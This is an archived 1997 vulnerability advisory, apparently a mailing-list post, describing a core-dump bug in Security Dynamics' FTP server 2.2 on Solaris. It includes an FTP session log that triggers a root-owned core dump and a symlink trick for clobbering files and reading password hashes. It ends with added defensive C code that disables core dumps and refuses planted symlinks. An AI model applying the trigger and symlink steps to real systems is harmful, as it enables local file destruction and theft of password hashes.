Security Dynamics FTP server core problem
Description: It is possible to cause this server to dump core while ftping in. The core file will clobber files and also contains crypt(3)ed passwords.
Compromise: root (local)
Vulnerable Systems: Solaris 2.5 running Security Dynamics' FTP server (Version 2.2), perhaps other versions.
Date: 12 November 1997

Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
Subject: BoS: Bug In Security Dynamics' FTP server (Version 2.2)
This bug is similar to the Solaris and other ftp core dump bugs, slightly
different though. BTW the machine is a SPARC 20 running 2.5. You can link
files and clobber them with a core to annoy your local sys admin or, even
better, get /etc/shadow, u get the point... anyways
220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
ftp> quote pasv
421 Service not available, remote server has closed connection
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it.
Not too useful, you say? Welp, prior to dumping the core you should link it
to ps_data or something like that, then you will get this
lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data
-rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data
ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'
$strings core | more
[ Junk cut --Fyodor ]
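
An added example, not part of the original post and not the vendor's fix: two defensive measures against this class of bug, written in C for a modern POSIX system. A privileged daemon switches off its own core dumps with setrlimit(RLIMIT_CORE), and a file is created with O_EXCL|O_NOFOLLOW so that a symlink planted at its name is refused. The function names and the temporary directory are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>

/* Mitigation 1: a privileged daemon switches off its own core dumps.
 * Lowering a limit never needs privilege. Returns 0 on success. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Mitigation 2: create a file without following a link planted at its name.
 * O_EXCL fails with EEXIST if anything, symlink included, is already there;
 * O_NOFOLLOW additionally refuses a symlink as the final path component. */
int create_no_follow(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario (hypothetical names): "core" -> "ps_data" in a fresh
 * temp directory. Returns 1 if the create was refused and ps_data is intact. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/coredemoXXXXXX", target[64], link[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/ps_data", dir);
    snprintf(link, sizeof link, "%s/core", dir);
    FILE *f = fopen(target, "w");
    if (f == NULL) return -1;
    fputs("keep", f);                 /* 4 bytes that must survive */
    fclose(f);
    if (symlink("ps_data", link) != 0) return -1;
    int fd = create_no_follow(link);  /* must fail: a link sits at "core" */
    int refused = (fd == -1 && errno == EEXIST);
    if (fd != -1) close(fd);
    int intact = (stat(target, &st) == 0 && st.st_size == 4);
    unlink(link); unlink(target); rmdir(dir);
    return refused && intact;
}

int main(void) { return !(disable_core_dumps() == 0 && demo_symlink_refused() == 1); }
```
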